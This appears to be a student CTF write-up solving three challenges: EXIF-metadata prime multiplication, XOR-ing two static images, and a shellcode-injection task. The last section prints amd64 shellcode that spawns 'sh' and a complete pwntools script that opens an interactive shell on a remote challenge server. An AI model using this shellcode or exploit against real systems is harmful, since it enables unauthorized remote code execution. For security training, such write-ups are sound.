Difference between revisions of "W4503 Capture the Flag III"

	Coming Soon
	This page will serve as the writeup for the CTF III competition problems that were released on January 12, 2021

Forensics[edit]

Prime Multiplication[edit]

[50 Points] There are 2 prime numbers associated with this image, multiply them together to get the flag.
Hint: flag format is ahsCTF{12345678}

The challenge also provides the file prime_multiplication.jpg.

We can examine the details of this image by using exiftool. Begin by downloading the image into the shell server using wget or SFTP. Then we can use exiftool to examine the metadata:

We get this output:

ExifTool Version Number         : 11.88
File Name                       : prime_multiplicaton.jpg
Directory                       : .
File Size                       : 936 kB
File Modification Date/Time     : 2021:01:19 08:01:27-06:00
File Access Date/Time           : 2021:01:19 08:01:26-06:00
File Inode Change Date/Time     : 2021:01:19 08:01:27-06:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 300
Y Resolution                    : 300
Exif Byte Order                 : Big-endian (Motorola, MM)
Orientation                     : Horizontal (normal)
Image Width                     : 2741
Image Height                    : 1901
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 2741x1901
Megapixels                      : 5.2

Notice that the image size is 2741x1901. These are both prime numbers, so let's multiply them as the challenge instructs us. 2741 times 1901 is 5,210,641. When we format this in flag format, we get ahsCTF{5210641}.

No Signal[edit]

[75 Points]

The challenge also provides the files static1.png and static2.png.

static1.png

static2.png

When we view the 2 provided image files, they seem to look like TV static. There are black and white pixels that seem to be randomly placed. However, there seems to be some text down the center, but it is difficult to decipher. Since we have two images, we can assume that we will have to use them together to reveal the message. In this case, we will have to XOR the corresponding pixels of each image. That means if we lay each image on top of each other, in each coordinate that there is one black and one white pixel the output will be a black pixel, and each coordinate where there is the same color pixel on the top and bottom will result in a white pixel (assuming white=0 and black=1). We can make a script to XOR each pixel, or we can simply use an image manipulation program to accomplish a similar idea, in this case, we used paint.net. We can put each image on a layer and then delete all white pixels on the top layer to emulate an XOR. We get this result:

staticAnswer.jpg

Therefore, the flag is ahsCTF{br0_!t$_st@tiC}.

Binary Exploitation[edit]

Enter Shellcode:[edit]

[75 Points] Welcome to the gauntlet! Start your binary exploitation journey by running this command: nc 138.197.96.104 50002.

When we run the given command, we get this output:

You just used Netcat to run this program!
Now I'm going to give you a file.
We'll use wget to download it into the shell:

wget [url]
You can find the url you'll need by right clicking the download link in the challenge and copying the address.

That file will have the key to part 2, submit it below.
Input:

Now let's get the password to submit to the program:

Now we can view key.txt to get this key: S3cretP@$$. When we type that into the program we're running via Netcat we get this output:

Correct!
Now it's time to exploit the program!
The program is located at 138.197.96.112:50001

This program will run any machine code that we give it.
...If you want to get technical, it treats whatever we input like it's a function. It does this by creating a function pointer where the input is stored.
The malicious machine code we will input is called shellcode.
We can use the pwntools, a Python library for exploiting programs, to generate some shellcode to run the "sh" command.
The "sh" command can generate a shell. You can try running it on your shell.

Run "pwn shellcraft -l" to see a list of all the shellcodes we can use.

Now, input the shellcode that we will use for this program (running on amd64 architecture).
Hint: it should be a string of hexadecimal values.

Input: 0x

This prompt gives us the address of the vulnerable program as well as a method to exploit it. Let's generate some shellcode and input it as the prompt suggests.

We get this shellcode:

6a6848b82f62696e2f2f2f73504889e768726901018134240101010131f6566a085e4801e6564889e631d26a3b580f05

Let's submit that shellcode to the prompt program as it expects. We get this output:

Correct!
Awesome! Now we just need to input that shellcode into the vulnerable program.
However, we must input raw hex values rather than a hexadecimal string. We also must ensure that we make the program interactive.

The pwntools library allows us to create Python scripts to generate shellcode and interact with programs.
You can download and modify the script at: https://raw.githubusercontent.com/reese-hoffart/tempCTFDownload/main/sampleExploit.py
Remember, wget can be used to download files into the shell.

Note that "flag.txt" is stored remotely with the program at the address given above.

This was the last prompt. This prompt gives us a sample script to exploit the vulnerable program that we were given in the previous prompt. Let's download that sample script using wget:

The sample script looks like this:

# This line imports the pwntools library.
from pwn import *

# This line sets the architecture and OS of the remote machine so that this exploit generates the correct shellcode.
# The program is running on a Linux machine. You already know the architecture from the prompt.
context.update(arch='', os='')

# This line creates the "vuln" object we will use to interact with the remote process.
# You should input the IP and port of the remote process.
vuln = remote('IP', port)

# This line creates the variable that holds the shellcode. Notice we use asm() to assemble it into raw instructions the computer can execute.
# Hmmm, we want to run "sh", not "cat". You should fix that.
shellcode = asm(shellcraft.cat())

# This line will wait to send input until the remote program prints out a newline.
vuln.recvuntil('\n')
# This line sends the shellcode as input.
vuln.sendline(shellcode)

# It's important we make the remote program connection interactive so we can interact with the shell we spawned.
vuln.interactive()

We can follow the comments in this file to finish the exploit. Notably, we must input the system architecture and operating system, input the remote vulnerable program's IP and port, and fix the shellcode that we are injecting. Here is the finished script:

# This line imports the pwntools library.
from pwn import *

# This line sets the architecture and OS of the remote machine so that this exploit generates the correct shellcode.
# The program is running on a Linux machine. You already know the architecture from the prompt.
context.update(arch='amd64', os='linux')

# This line creates the "vuln" object we will use to interact with the remote process.
# You should input the IP and port of the remote process.
vuln = remote('138.197.96.112', 50001)

# This line creates the variable that holds the shellcode. Notice we use asm() to assemble it into raw instructions the computer can execute.
# Hmmm, we want to run "sh", not "cat". You should fix that.
shellcode = asm(shellcraft.sh())

# This line will wait to send input until the remote program prints out a newline.
vuln.recvuntil('\n')
# This line sends the shellcode as input.
vuln.sendline(shellcode)

# It's important we make the remote program connection interactive so we can interact with the shell we spawned.
vuln.interactive()

Alright! Let's run this script:

When we run the script, we get an interactive shell. This shell is running on the remote server that the vulnerable program is on. We can run the "ls" command to see all the files, and then run "cat flag.txt" to view the flag. The flag is ahsCTF{sh3LLc0deR_MeRl!n}.